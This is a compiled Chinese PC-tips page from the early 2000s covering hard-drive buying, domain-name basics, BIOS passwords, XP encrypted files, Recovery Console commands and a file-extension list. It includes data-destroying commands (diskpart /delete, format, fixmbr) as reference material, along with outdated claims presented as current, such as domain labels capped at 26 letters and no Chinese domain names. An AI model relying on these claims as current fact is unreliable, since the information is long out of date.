   购买新硬盘之前，必须先明确你的需求，而这正是升级硬盘的第一步。

1、选择移动硬盘还是内置硬盘？
   首先，问问自己需要内置硬盘还是移动硬盘？移动硬盘具有可便携性及安装容易的优点，完全可以满足了现代办公中大容量数据传输的需求，但一般而言也比较贵，适合用来储存有安全保密的资料，例如财务记录。平时关机后也可以将它卸下。如果你有一台iMac，移动硬盘更是你惟一的选择。

   内置硬盘硬盘价格便宜，不占桌面空间，也不需使用任何外接接口。虽然安装时需要比较麻烦，但是PC和PowerMac都可以接受另外一块内置硬盘。如果你打算买内置硬盘，先确定电脑里的空间是否足够。打开主机外壳检查里面有没有空的磁盘驱动器槽，台式电脑机壳内的磁盘驱动器槽排列于主机前端，你常会在规格中看到所谓的几大几小，一般硬盘是安装在小（3.5寸）的空间，若你要把它安装在大空间（5.25寸），你必须再花个几十元买一个转接卡托座（一般常用抽取盒）。

2、硬盘接口类型
  接下来考虑硬盘跟电脑的接口型式。PC和Mac的内置硬盘有两种常用的接口型式：SCSI和IDE，旧式的Mac大部分使用SCSI接口，而PC和PowerMac G3以上机种通常使用IDE。假如你的PowerMac G3附有内建LVD SCSI硬盘，其扩充卡可以支持第二颗内置硬盘SCSI硬盘，使用IDE接口的电脑也可以加装SCSI接口的扩充卡（SCSI的速度比IDE快）。
  现在的移动硬盘可以按接口类型分为四类：并口、PCMCIA接口、USB口、1394接口。早期的移动硬盘多是并口和PCMCIA接口。并口是最早的移动硬盘的接口方式，与串口相比，其速度要快一些，通常为115kbps。PCMCIA接口的移动硬盘是专为笔记本电脑用户设计的，它比并口移动硬盘要好用得多，首先是传输速度更快，第二是解决了热拔插问题。USB接口移动硬盘的出现，得益于USB接口的广泛普及，它的各方面的性能都比以前的移动硬盘要好许多，尤其是其对操作系统、机型的全面适应，为其迅速流行提供了很好的条件。IEEE1394接口的移动硬盘以其400Mbps的传输率傲视其他类型的移动硬盘，目前除了体积略比USB接口的要大一点以外，几乎没有什么弱项。用户如果需要使用的话还要另外加装一块IEEE1394接口。目前一般PC常见的是USB、并行端口、SCSI。MAC则有USB、1394，而笔记型电脑除USB、1394外还可以选择PC卡，你可以查阅电脑手册找出正确的接口型式。

3、硬盘容量
  硬盘容量也是你应该考虑的问题，目前900元不到就可买到60GB的内置IDE接口硬盘，相信这样的容量足够你使用的。目前60G的硬盘已成为了主流，极具性价比，如果你选择的是内置硬盘的话，最好选择这个级别的产品；至于移动硬盘最好选择20G的产品。
   不过对于使用老主板的朋友，要注意你的主板是否支持大容量硬盘，虽然现在主板对硬盘的支持程度应该够高，不过如果你用的是Socket 7这种古董级主板，请先确定它可以支持到多大的硬盘容量，要不买了一个60GB的硬盘，结果老主板却无法支持。遇到这种情况，你可以先到原厂下载最新的BIOS或用使用DM之类的软件来试试，如果还不行只好连主板一起升级了。

二、是否需要其它配件
  数据线和转接卡
  某些硬盘会和其组件一起包装，需要的接口导线和其它组件都附在里面。如果你只单买硬盘，记得另外要买足够的配备组件。移动硬盘只需要导线，但是许多内置硬盘需要转接卡托座（或用抽取盒）和螺丝才能固定于硬盘槽（标准的槽宽为5.25英寸，而大部分的内置硬盘硬盘为3.5寸宽），在你开始安装之前确实准备好所有必要的东西。
   数据线也是一个需要注意的问题，目前的ATA-66或ATA-100硬盘是使用新型的连接导线，而不是简单的40脚位导线，这些较快速的装置使用40脚位/80导线，这两种导线从外表看似乎是一样的，但如果你接近一点看，你会发现许多细微的线，这多出来的40条线都是地线，用来保护邻线因为快速讯号所产生的电子中断问题。如果不用这些新的导线，就无法让ATA-100接口的装置允分发挥其应用的性能，许多系统在不使用新款导线的预设传输速度可能只是ATA-33，这样即使你用ATA-100的硬盘，也不能允分发挥其真正的性能。是否能达到ATA-66或ATA-100标准的传输率还要看你的主板是否支持，一般BX以后的主板都支持ATA-66标准，目前比较新款的主板大多数支持ATA-100标准甚至ATA-133标准。如果你刚购买的主板有支持此规格，在标准配备中也会附上一条ATA-100导线。有时导线也会随着储存装置附赠，如果你需要自己购买的话，价位大概在8~10元之间。
   如果你想升级到ATA-100却又不想升级只支持到ATA-33的主板，市面上有不少这样的转接卡，价格大概在200~300元之间。不过这样不是很划算，在加个二、三百块钱就可以重新买个新主板了。


域 名 知 识

《一键清理系统垃圾》

域 名 知 识

1. 什么是Internet域名?
   从技术上讲，域名只是一个Internet中用于解决地址对应问题的一种方法。可以说只是一个技术名词。但是，由于Internet已经成为了全世界人的Internet，域名也自然地成为了一个社会科学名词。 Internet域名是Internet网络上的一个服务器或一个网络系统的名字，在全世界，没有重复的域名。域名的形式是以若干个英文字母和数字组成，由“.”分隔成几部分， 如IBM.COM就是一个域名，CHINADNS.COM是一个国际域名。无论是国际或国内域名，全世界接入Internet网的人都能够准确无误的访问到。从社会科学的角度看，域名已成为了Internet文化的组成部分。从商界看，域名已被誉为“企业的网上商标”。没有一家企业不重视自己产品的标识--商标，而域名的重要性和其价值，也已经被全世界的企业所认识。1998年3月一个月内，世界上注册了179，331个通用顶级域名（据InterNIC资料），平均每天注册5977个域名，每分钟25个！这个记录正在以每月7%的速度增长。中国国内域名注册的数量，从96年底之前累计的300多个，至98年11月猛增到的16644个,每月增长速度为10%。

2. 为什么要注册域名？
   Internet域名如同商标，是你的标志之一。人们在飞快地注册域名。在美国，连街头上的小百货店和小加油站都在注册他们的域名，以便在网上宣传自己的产品和服务。作为有头脑、有远见的商人，越早行动，越有可能获得你所需要的域名。在美国，在Internet上注册域名的公司从1995年初的25,000家猛增到目前的超过400,000家。有人把这件事情比喻成当年发现新大陆、人们趋之若鹜的状况。新大陆的资源有限，Internet上的域名更有限－因为每个域名都只有一个。如果你公司的名字是Intellectual Business ManagementLtd.,你想把公司的域名注册成IBM.COM，国际商用机器公司（IBM）同你相比并不具有什么优先权，然而这个域名早已被它抢到手了！

3. 注册域名的规则是什么?
   先申请，先批准。

4. Internet域名注册由什么机构管理?
   国内域名由中科院域名管理中心负责，国际域名由设在美国的Internet信息管理中心 InterNIC和它设在世界各地的分支机构负责批准域名的申请。

5. 注册域名需要什么条件?
   注册国内域名需申请表打印件并加盖公章，连同单位营业执照副本复印件（或政府机构条码证书复印件），单位介绍信（介绍由ChinaDNS代申请某域名）一同交或寄给ISP；注册国际域名没有条件限制。单位和个人均可以申请。你只需要填写一个表格，告诉ISP你需要的域名是什么。其他的事情交给ISP去做。

6. 我们公司的业务目前局限于本地，是否需要Internet域名?
   作为一个精明的经营者，你可以想象得到，在几年之后，你的公司马路对面的客户需要你的产品资料时，是派人来取走呢，还是顺手打开电脑？当你公司推出新产品时，是最先放在网络上，还是去找印刷厂？或者，你也许还没有认识到，Internet域名很有可能替代电话号码成为与你联系的最佳方式－试想：假如你的公司叫“联盟信息有限公司”，你觉得LIANMENG.COM好记还是你的电话号码86-10-67435476好记？

7. 什么是域名的层次?
   域名分为顶层（TOP-LEVEL）、第二（SECOND-LEVEL）、子域（SUB-DOMAIN）等。
   顶层分为几种类型，分别是：
    .COM 商业性的机构或公司
    .ORG 非盈利的组织、团体
    .GOV 政府部门
    .MIL 军事部门
    .NET 从事Internet相关的网络服务的机构或公司
    .XX由两个字母组成的国家代码，如中国为.CN，日本为.JP等
   一般来说大型的或有国际业务的公司或机构不使用国家代码。这种不带国家代码的域名也叫国际域名。这种情况下，域名的第二层就是代表一个机构或公司的特征部分，如IBM.COM中的IBM。对于具有国家代码的域名，代表一个机构或公司的特征部分则是第三层，如ABC.COM.CN中的ABC。

8. 我们公司在中国，我们能否申请国际性的域名?
   可以。

9. 哪些字母和数字可以用于域名？
   英文26个字母和10个阿拉伯数字以及横杠“－”可以用作域名。字母的大小写没有区别。每个层次最长不能超过26个字母。中文不能用作域名。

10.中文为什么不能用作域名?
   为了使全世界的人们都能使用Internet，地方性的、民族性的文字就不能使用。试想，如果中文可以用作域名，阿拉伯文、希腊文...都应该可以，你认识它们吗？你会在计算机键盘上输入这些字符吗？

11.怎样选择最佳的域名？
   按照习惯，一般使用你的名称或商标作为域名。域名的字母组成要便于记忆，能够给人留下较深的印象。如果你有多个很有价值的商标，最好都进行注册保护。你也可以选择你的产品或行业类型作为域名，例如你的企业是东方计算机公司，east.com或east.com.cn将是一个很好的选择，可惜这类域名基本上已经被人“瓜分”完了，很难注册到。

12.为什么没注上域名比商标被抢注更头痛？
   由于域名和商标都在各自的范畴内具有唯一性，并且，随着Internet的发展，从企业树立形象的角度看，域名又从某种意义上讲，和商标有着潜移默化的联系。所以，它与商标有一定的共同特点。许多企业在选择域名时，往往希望用和自己企业商标一致的域名。但是，域名和商标相比又具有更强的唯一性。举个例子吧（这是真事）！
   同样持有Panda（熊猫）注册商标的熊猫电子集团公司和北京日化二厂之间出现过域名注册中的冲突，按照《中国互联网络域名注册暂行管理办法》规定，两家公司都有权以panda为域名注册，但是panda.com.cn只有一个，那么，在域名申请都符合《中国互联网络域名注册暂行管理办法》规定的情况下，CNNIC按照“先来先注册”的原则处理申请。北京日化二厂先申请了panda.com.cn，而熊猫电子集团公司在北京日化二厂已注册成功，并且网站已经开通后，才提交panda.com.cn域名的申请，其结果是熊猫电子集团公司已经无法以panda.com.cn 作为自己的域名了。
   从上面这个例子不难看出，熊猫电子集团虽然仍旧可以卖他的熊猫牌电器，但是，他恐怕永远也无法让他的用户看到属于他的www.panda.com.cn网站。这无疑是一个遗憾。


在BIOS中设置开机密码

《一键清理系统垃圾》

在BIOS中设置开机密码

   设置开机密码、设置屏保密码、设置文件密码都是有益的一些保护措施，但也不能对密码的有效程度过分信赖，因为这些密码对于专业人员来说都是极易破解的。但对于一般办公环境来说，设置开机密码还是有相当作用的。下面我们来看一下在BIOS中如何设置开机密码。
   开机后按键盘的Delete键进入BIOS界面。
   找到User Password选项，其默认为关闭状态。
   激活并输入用户密码（1～8位，英文或者数字）。
   电脑提示请再输入一遍以确认密码无误，保存退出后重新启动机器，这时就会在开机时出现密码菜单。


在Windows XP中查找加密文件

《一键清理系统垃圾》

在Windows XP中查找加密文件

   Windows XP 系统为用户提供了在NTFS驱动器上为文件夹或文件加密的功能，有时您对一些文件进行了加密处理，过一段时间后很难在“资源管理器”中一眼就认出哪些文件已被加密，哪些文件未经加密。当然，通过右键单击每个文件，并在随后弹出的快捷菜单上选择“属性”命令，在“常规”选项卡上单击“高级”按钮即可查看该文件或文件夹是否加密，但是这种操作太麻烦了。这里有两种相对简便的方法来查找加密文件。
1．在“资源管理器”中使用“详细信息”视图
   在“资源管理器”中打开某一包含有加密文件的文件夹，在“查看”菜单中打开“选择详细信息”命令，将“属性”项打上勾，点击“确定”。 再在“查看”菜单中选择“详细信息”项，你将会看到加密的文件在“资源管理器”的“属性”列中以字母“AE”被标记出来。

2．使加密文件的颜色区别于其他文件
  在“工具”菜单上，选择“文件夹选项”，并在随后弹出对话框内的“查看”选项卡上选中“用彩色显示经过加密或压缩的NTFS文件”复选框，确定即可。于是，再查看文件夹时，便会看到加密的文件或文件夹呈绿色显示。
  如果你使用的是Windows XP系统，并且对一些文件或文件夹进行了加密处理，不妨用以上方法试一试。


整理了七个小时的东东

《一键清理系统垃圾》

整理了七个小时的东东

目录：一：详细的xp修复控制台命令和用法
      二：常见文件扩展名和它们的说明
      三：GHOST怎么用?
      四：如何防范恶意网站
      五：win2000/xp忘记密码的方法
      六：Windows XP 自带小工具
      七：windows中有关网络的几命令
      八：了解你的windows目录和系统文件
      九：低级格式化的主要作用
      十：封杀QQ消息连发器病毒
     十一：ie项目修改大全！所有的ie问题都来这里看吧！
     十二：注册表备份和恢复
     十三：详细的xp修复控制台命令
     十四：3721如何彻底关闭
     十五：讲解Windows XP无人值守自动安装
     十六：多操作系统共存技巧
     十七：计算机启动过程详解
     十八：Windows 2k/XP登录口令丢失的解决办法
     十九：学会xp的20个技巧
     二十：关于ping
   二十一：windows非法操作详解
   二十二：注册表全解
   二十三：windows中有关网络的几命令
   二十四：NTFS和FAT分区的问答
   二十五：六大软件伤硬盘
   二十六：&#36;NtUninstallQ……&#36;\恶意修改网爷的解决

★一。★详细的xp修复控制台命令和用法!!!
放入xp（2000）的光盘，安装时候选R，修复！
Windows XP（包括 Windows 2000）的控制台命令是在系统出现一些意外情况下的一种非常有效的诊断和测试以及恢复系统功能的工具。小编的确一直都想把这方面的命令做个总结，这次辛苦老范给我们整理了这份实用的秘笈。
    Bootcfg
    bootcfg 命令启动配置和故障恢复（对于大多数计算机，即 boot.ini 文件）。
    含有下列参数的 bootcfg 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 bootcfg 命令。
    用法：
    bootcfg /default　　设置默认引导项。
    bootcfg /add　　　　向引导列表中添加 Windows 安装。
    bootcfg /rebuild　　重复全部 Windows 安装过程并允许用户选择要添加的内容。
    注意：使用 bootcfg /rebuild 之前，应先通过 bootcfg /copy 命令备份 boot.ini 文件。
    bootcfg /scan　　　 扫描用于 Windows 安装的所有磁盘并显示结果。
    注意：这些结果被静态存储，并用于本次会话。如果在本次会话期间磁盘配置发生变化，为获得更新的扫描，必须先重新启动计算机，然后再次扫描磁盘。
    bootcfg /list　　　列出引导列表中已有的条目。
    bootcfg /disableredirect 在启动引导程序中禁用重定向。
    bootcfg /redirect [ PortBaudRrate] |[ useBiosSettings]
    在启动引导程序中通过指定配置启用重定向。
    范例：
bootcfg /redirect com1 115200
bootcfg /redirect useBiosSettings
    hkdsk
    创建并显示磁盘的状态报告。Chkdsk 命令还可列出并纠正磁盘上的错误。
    含有下列参数的 chkdsk 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 chkdsk 命令。
    vol [drive:] [ chkdsk [drive:] [/p] [/r]
    参数　　无
    如果不带任何参数，chkdsk 将显示当前驱动器中的磁盘状态。
drive: 指定要 chkdsk 检查的驱动器。
/p　　 即使驱动器不在 chkdsk 的检查范围内，也执行彻底检查。该参数不对驱动器做任何更改。
/r　　 找到坏扇区并恢复可读取的信息。隐含着 /p 参数。
    注意
Chkdsk 命令需要 Autochk.exe 文件。如果不能在启动目录（默认为 \%systemroot%\System32）中找到该文件，将试着在 Windows 安装 CD 中找到它。如果有多引导系统的计算机，必须保证是在包含 Windows 的驱动器上使用该命令。
Diskpart
    创建和删除硬盘驱动器上的分区。diskpart 命令仅在使用故障恢复控制台时才可用。
    diskpart [ /add |/delete] [device_name |drive_name |partition_name] [size]
    参数 无
    如果不带任何参数，diskpart 命令将启动 diskpart 的 Windows 字符模式版本。
    /add
    创建新的分区。
    /delete
    删除现有分区。
    device_name
    要创建或删除分区的设备。设备名称可从 map 命令的输出获得。例如，设备名称：
    \Device\HardDisk0
    drive_name
    以驱动器号表示的待删除分区。仅与 /delete 同时使用。以下是驱动器名称的范例：
    D:
    partition_name
    以分区名称表示的待删除分区。可代替 drive_name 使用。仅与 /delete 同时使用。以下是分区名称的范例：
    \Device\HardDisk0\Partition1
     大小
    要创建的分区大小，以兆字节 (MB)表示。仅与 /add 同时使用。
    范例
    下例将删除分区：
diskpart /delete \ Device\ HardDisk0\ Partition3
diskpart /delete F:
    下例将在硬盘上添加一个 20 MB 的分区：
    diskpart /add \ Device\ HardDisk0 20
    Fixboot
    向系统分区写入新的分区引导扇区。只有在使用故障恢复控制台时，才能使用 fixboot 命令。
    fixboot [drive]
    参数　　驱动器
    将要写入引导扇区的驱动器。它将替代默认的驱动器（即用户登录的系统分区）。例如，驱动器：D:
    范例
    下列命令范例向驱动器 D: 的系统分区写入新的分区引导扇区：
    fixboot d:
    注意: 如果不带任何参数，fixboot 命令将向用户登录的系统分区写入新的分区引导扇区。
    Fixmbr
    修复启动磁盘的 主启动记录。fixmbr 命令仅在使用故障恢复控制台时才可用。
    fixmbr [ device_name]
    参数
    device_name
    要写入新的主引导记录的设备（驱动器）。设备名称可从 map 命令的输出获得。例如，设备名称：
    \Device\HardDisk0
    范例
    下列命令示例向指定设备写入一个新的主引导记录：
    fixmbr \Device\HardDisk0
    注意
如果不指定 device_name，新的主引导记录将被写入引导设备，即装载主系统的驱动器。
如果系统检测到无效或非标准分区表标记，将提示用户是否继续执行该命令。除非您访问驱动器有问题，否则不要继续进行。向系统分区写入新的主引导记录可能破坏分区表并导致分区无法访问。
    Format
    将指定的驱动器格式化为指定的文件系统。含有下列参数的 format 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 format 命令。
    format [ drive:] [ /fs:file-system]
    参数
    drive:
    指定要格式化的驱动器。不能从故障恢复控制台格式化软盘。
    /q
    对驱动器进行快速格式化。不扫描驱动器看是否有坏区域，因此只应对以前格式化过的驱动器使用该参数。
    /fs:file-system
    指定要使用的文件系统：FAT、FAT32 或 NTFS 。如果未指定文件系统，将使用现有的文件系统格式。
    Map
    显示驱动器号与物理设备名称的映射。该信息在运行 fixboot 和 fixmbr 命令时非常有用。
    map 命令仅在使用故障恢复控制台时才可用。
    Map [ arc]
    参数
    arc
    指示 map 命令显示高级 RISC 计算 (ARC)设备名称而不是设备名称。以下是 ARC 设备名称的范例：
    multi(0)disk(0)rdisk(0)partition(1)
    等价的设备名称是：
    \Device\HardDisk0\Partition1
    范例
    下例将物理设备名映射为使用 ARC 设备名称的驱动器号：
    map arc
    注意
如果不使用 arc 参数，则 map 命令显示设备名称。
map 命令还显示文件系统的类型和每个磁盘的大小（MB）。

QUOTE:
一：详细的xp修复控制台命令和用法

QUOTE:

--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 03:58　　 标题: 整理了七个小时的东东！[申请加精]

[这个贴子最后由zidiaodiao在 2004/01/07 04:06am 第 1 次编辑]

二。★★★常见文件扩展名和它们的说明
常见文件扩展名和它们的说明
A
ACE：Ace压缩档案格式
ACT：Microsoft office助手文件
AIF，AIFF：音频互交换文件，Silicon Graphic and Macintosh应用程序的声音格式
ANI：Windows系统中的动画光标
ARC：LH ARC的压缩档案文件
ARJ：Robert Jung ARJ压缩包文件
ASD：Microsoft Word的自动保存文件；Microsoft高级流媒体格式（microsoft advanced streaming
format，ASF）的描述文件；可用NSREX打开 Velvet Studio例子文件
ASF：Microsoft高级流媒体格式文件
ASM：汇编语言源文件，Pro/E装配文件
ASP：动态网页文件；ProComm Plus安装与连接脚本文件；Astound介绍文件
AST：Astound多媒体文件；ClarisWorks“助手”文件
Axx：ARJ压缩文件的分包序号文件，用于将一个大文件压至几个小的压缩包中（xx取01-99的数字）
A3L：Authorware 3.x库文件
A4L：Authorware 4.x库文件
A5L：Authorware 5.x库文件
A3M，A4M：Authorware Macintosh未打包文件
A3W，A4W，A5W：未打包的Authorware Windows文件
B
BAK：备份文件
BAS：BASIC源文件
BAT：批处理文件
BIN：二进制文件
BINHex：苹果的一种编码格式
BMP：Windows或OS/2位图文件
BOOK：Adobe FrameMaker Book文件
BOX：Lotus Notes的邮箱文件
BPL：Borlard Delph 4打包库
BSP：Quake图形文件
BUN：CakeWalk 声音捆绑文件(一种MIDI程序)
C
C0l：台风波形文件
CAB：Microsoft压缩档案文件
CAD：Softdek的Drafix CAD文件
CAM：Casio照相机格式
CAP：压缩音乐文件格式
CAS：逗号分开的ASCⅡ文件
CCB：Visual Basic动态按钮配置文件
CCH：Corel图表文件
CCO：CyberChat数据文件
CCT：Macromedia Director Shockwave投影
CDA：CD音频轨道
CDF：Microsoft频道定义格式文件
CDI：Philip的高密盘交互格式
CDM：Visual dBASE自定义数据模块文件
CDR：CorelDRAW绘图文件；原始音频CD数据文件
CDT：CorelDRAW模板
CDX：CorelDRAW压缩绘图文件；Microsoft Visual FoxPro索引文件
CFG：配置文件
CGI：公共网关接口脚本文件
CGM：计算机图形元文件
CH：OS/2配置文件
CHK：由Windows磁盘碎片整理器或磁盘扫描保存的文件碎片
CHM：编译过的HTML文件
CHP：Ventura Publisher章节文件
CHR：字符集（字体文件）
CHT：ChartViem文件；Harvard Graphics矢量文件
CIF：Adaptec CD 创建器 CD映像文件
CIL：Clip Gallery下载包
CIM：SimCity 2000文件
CIN：OS/2改变控制文件用于跟踪INI文件中的变化
CLASS：Java类文件
CLP：Windows 剪贴板文件
CLL：Crick Software Clicker文件
CLS：Visual Basic类文件
CMD：Windows NT，OS/2的命令文件；DOS CD/M命令文件；dBASEⅡ程序文件
CPI：Microsoft MS-DOS代码页信息文件
CPL：控制面板扩展名，Corel颜色板
CPP：C++代码文件
CPR：Corel提供说明书文件
CPT：Corel 照片-绘画图像
CST：Macromedia Director Cast文件
CUR：Windows光标文件
D
DBF：dBASE文件，一种由Ashton-Tate创建的格式，可以被ACT！、Lipper、FoxPro、Arago、Wordtech、Xbase和类似数据库或与数据库有关产品识别；可用数据文件（能被Excel
97打开）；Oracle 8.1.x表格空间文件
DBX：DataBearn图像；Microsoft Visual FoxPro表格文件
DCT：Microsoft Visual FoxPro数据库容器
DCU：Delphi编译单元文件
DCX：Microsoft Visual FoxPro数据库容器；基于PCX的传真图像；宏
DIR：MacromediaDirector文件
DLL：动态链接库
DOC：FrameMaker或FrameBuilder文档；Word Star文档、Word
Perfect文档、Microsoft：Word文档；DisplayWrite文档
DOT：Microsoft Word文档模板
DPL：Borland Delph 3压缩库
DRV：驱动程序
DRW：Micrografx Designer/Draw；Pro/E绘画文件
DSF：Micrografx Designer VFX文件
DSG：DOOM保存的文件
DSM：Dynamic Studio音乐模块（MOD）文件
DSP：Microsoft Developer Studio工程文件
DSQ：Corel QUERY（查询）文件
DST：刺绣机图形文件
DSW：Microsoft Developer Studio工作区文件
DTA：World Bank（世界银行）的STARS数据文件
DTD：SGML文档类型定义（DTD）文件
DTED：地面高度数字数据（图形的数据格式）文件
DTF：Symantec Q&A相关的数据库数据文件
DTM：DigiTrakker模块文件
DUN：Microsoft拔号网络导出文件
DV：数字视频文件（MIME）
DWG：AutoCAD工程图文件；AutoCAD或Generic CADD老版本的绘图格式
DXR：Macromedia Director受保护（不可编辑）电影文件
E
EDA：Ensoniq ASR磁盘映像
EDD：元素定义文档（FrameMaker+SGML文档）
EDE：Ensoniq EPS磁盘映像
EDK：Ensoniq KT磁盘映像
EDQ：Ensoniq SQ1/SQ2/Ks32磁盘映像
EDS：Ensoniq SQ80磁盘映像
EDV：Ensoniq VFX-SD磁盘映像
EFA：Ensoniq ASR文件
EFE：Ensoniq EPS文件
EFK：Ensoniq KT文件
EFQ：Ensoniq SQ1/SQ2/Ks32文件
EFS：Ensoniq SQ80文件
EFV：Ensoniq VFX-SD文件
EMD：ABT扩展模块
EMF：Windows增强元文件
EML：Microsoft Outlook Express邮件消息（MIME RTC822）文件
EXE：可执行文件（程序）
F
FAV：Microsoft Outlook导航条
FAX：传真类型图像
FCD：虚拟CD-ROM
FDF：Adobe Acrobat表单文档文件
FLA：Macromedia Flash电影
FND：Microsoft Explorer保存的搜索文件（Find applet）
FON：系统字体
FRT：Microsoft FoxPro报表文件
FRX：Visual Basic表单文本；Microsoft FoxPro报表文件
FXP：经Microsoft FoxPro编译的源文件
G
GDM：铃声、口哨声和声音板模块格式
GetRight：GetRight未完成的下载文件
GHO：Norton 克隆磁盘映像
GID：Windows 95全局索引文件（包括帮助状态）
GIF：CompuServe位图文件
GL：动画格式
GRP：程序管理组
H
HEX：Macintosh BinHex2.0文件
HLP：帮助文件；Date CAD Windows帮助文件
HPP：C++程序头文件
HQX：Macintosh BinHex 4.0文件
HT：HyperTerminal（超级终端）
HTM，HTML：超文本文档
HTT：Microsoft超文本模板
HTX：扩展HTML模板
I
ICO：Windows图标
IDX：Microsoft FoxPro相关数据库索引文件；Symantec Q&A相关数据库索引文件；Microsoft Outlook
Express文件
IMG：GEM映像
INF：信息文件
INI：初始化文件；Mwave DSP Synth的“nwsynth.ini” GMS安装；Cravis Ultrasound bank安装
INP：Oracle 3.0版或早期版本的表单源代码
INRS：INRS远程通信声频
INS：InstallShield安装脚本；X-Internet签字文件；Ensoniq EPS字簇设备；Cell/ⅡMAC/PC抽样设备
INT：中间代码，当一个源程序经过语法检查后编译产生一个可执行代码
IOF：Findit文档
IQY：Microsoft Internet查询文件
ISO：根据ISD 9660有关CD-ROM文件系统标准列出CD-ROM上的文件
ISP：X-Internet签字文件
IST：数字跟踪设备文件
ISU：InstallShield卸装脚本
IT：脉冲跟踪系统音乐模块(MOD)文件
ITI：脉冲跟踪系统设备
ITS：脉冲跟踪系统抽样，Internet文档位置
IV：Open Inventor中使用的文件格式
IVD：超过20/20微观数据维数或变量等级文件
IVP：超过20/20的用户子集配置文件
IVT：超过20/20表或集合数据文件
IVX：超过20/20微数据目录文件
IW：Idlewild屏幕保护程序
IWC：Install Watch文档
J
J62：Ricoh照相机格式
JAR：Java档案文件（一种用于applet和相关文件的压缩文件）
JAVA：Java源文件
JAR：Java档案文件（一种用于applet和相关文件的压缩文件）
JAVA：Java源文件
JFF，JFIF，JIF：JPEG文件
JPE，JPEG，JPG：JPEG图形文件
JS：JavaScript源文件
JSP：HTML网页，其中包含有对一个Java servlet的参考
K
KAR：卡拉OK MIDI文件（文本+MIDI）
L
LAB：Visual dBASE标签文件
LBT，LBX：Microsoft FoxPro标签文件
LDB：Microsoft Access加锁文件
LHA：LZH更换文件后缀
LOG：日志文件
LZH：LH ARC压缩档案
M
M1V：MPEG相关文件(MIME"mpeg"类型)
M3D：Corel Motion 3D动画文件
M3U：MPEG URL（MIME声音文件）
MAM：Microsoft Access宏
MAQ：Microsoft Access查询文件
MAR：Microsoft Access报表文件
MBX：Microsoft Outlook保存email格式；Eudora邮箱
MCW：Microsoft Word的Macintosh文档
MDB：Microsoft Access数据库
MDN：Microsoft Access空数据库模板
MDW：Microsoft Access工作组文件
MID：MIDI音乐
MMM：Microsoft多媒体电影
MOV：QuickTime for Windows电影
MP2：第二层MPEG音频文件
MP3：第三层MPEG音频文件
MPA：MPEG相关文件，MIME“mpeg类型”
MPE，MPEG，MPG：MPEG动画文件
MPP：Microsoft工程文件；CAD绘图文件格式
MPR：Microsoft FoxPro菜单（已编译）
MSI：Windows 安装器包
MSN：Microsoft 网络文档；Descent Mission文件
O
OBD：Microsoft Office活页夹
OBJ：对象文件
OBZ：Microsoft Office活页夹向导
OCX：Microsoft对象链接与嵌入定制控件
ODS：Microsoft Outlook Express邮箱文件
OFT：Microsoft Outlook模板
OPX：OPL扩展DLL（动态链接库）
OSS：Microsoft Office查找文件
OST：Microsoft Exchange / Outlook 离线文件
P
PAL：压缩文件
PART：Go！Zilla部分下载文件
PAS：Pascal源代码
PCS：PICS动画文件
PDF：Adobe Acrobat
可导出文档格式文件（可用Web浏览器显示）；Microsoft系统管理服务器包定义文件；NetWare打印机定义文件
PHP，PHP3：包含有PHP脚本的HTML网页
PHTML：包含有PHP脚本的HTML网页；由Perl分析解释的HTML
PM5：Pagemaker 5.0文件
PM6：Pagemaker 6.0文件
PPS：Microsoft Powerpoint幻灯片放映
PPT：Microsoft Powerpoint演示文稿
PRF：Windows系统文件，Macromedia导演设置文件
PSD：Adobe photoshop位图文件
PSM：Protracker Studio模型格式；Epic游戏的源数据文件
PST：Microsoft Outlook个人文件夹文件
PWL：Windows 95口令列表文件
Q
QIF：QuickTime相关图像（MIME）；Quicken导入文件
QT，QTM：QuickTime电影
QTI，QTIF：QuickTime相关图像
QTP：QuickTime优先文件
QTS：Mac PICT图像文件；QuickTime相关图像
QTX：QuickTime相关图像
R
RA：RealAudio声音文件
RAM：RealAudio元文件
RAR：RAR压缩档案（Eugene Roshall格式）
REC：录音机宏；RapidComm声音文件
REG：注册表文件
REP：Visual dBASE报表文件
RES：Microsoft Visual C++资源文件
RM：RealAudio视频文件
RMF：Rich Map格式（3D游戏编辑器使用它来保存图）
ROM：基于盒式磁带的家庭游戏仿真器文件（来自Atari
2600、Colecovision、Sega、Nintendo等盒式磁带里的ROM完全拷贝，在两个仿真器之间不可互修改）
Rxx：多卷档案上的RAR压缩文件（xx=1～99间的一个数字）
S
SAV：游戏保存文件
SB：原始带符号字节（8位）数据
SBK：Creative Labs的Soundfont 1.0 Bank文件；(Soundb laster)/EMU SonndFont v1.x
Bank文件
SBL：Shockwave Flash对象文件
SCF：Windows Explorer命令文件
SCH：Microsoft Schedule+1
SCP：拨号网络脚本文件
SCR：Windows屏幕保护；传真图像；脚本文件
SFX：RAR自解压档案
SHTML：含有服务器端包括（SSI）的HTML文件
SPL：Shockwave Flash对象；DigiTrakker抽样
SQL：Informix SQL查询；通常被数据库产品用于SQL查询（脚本、文本、二进制）的文件扩展名
STM：.shtml的短后缀形式，含有一个服务端包括（SSI）的HTML文件；Scream Tracker V2音乐模块（MOD）文件
STR：屏幕保护文件
SWA：在Macromedia导演文件（MP3文件）中的Shockwave声音文件
SWF：Shockwave Flash对象
SYS：系统文件
T
T64：Commodore 64仿真器磁带映像文件
THEME：Windows 95桌面主题文件
TIF，TIFF：标签图像文件格式（TIFF）位图
TMP：Windows临时文件
TRM：终端文件
TXT：ASCⅡ文本格式的声音数据
TZ：老的压缩格式文件
V
VBA：VBase文件
VBP：Microsoft Visual Basic工程文件
VBW：Microsoft Visual Basic工作区文件
VBX：Microsoft Visual Basic用户定制控件
VQE，VQL：Yamaha Sound-VQ定位器文件
VQF：Yamaha Sound-VQ文件（可能出现标准）
VRF：Oracle 7配置文件
VSL：下载列表文件（GetRight）
W
WAB：Microsoft Outlook文件
WAD：包含有视频、玩家水平和其他信息的DOOM游戏的大文件
WAL：Quake 2正文文件
WAV：Windows波形声形
WBK：Microsoft Word备份文件
WFM：Visual dBASE Windows表单
WFN：在CorelDRAW中使用的符号
WIZ：Microsoft Word向导
WRL：虚拟现实模型
WWL：Microsoft Word内插器文件
X
XLK：Microsoft Excel备份
XLL：Microsoft Excel内插器文件
XLM：Microsoft Excel宏
XLS：Microsoft Excel工作单
XLT：Microsoft Excel模板
XLV：Microsoft Excel VBA模块
XLW：Microsoft Excel工作簿/工作区
Z
ZAP：Windows软件安装配置文件
ZIP：Zip文件
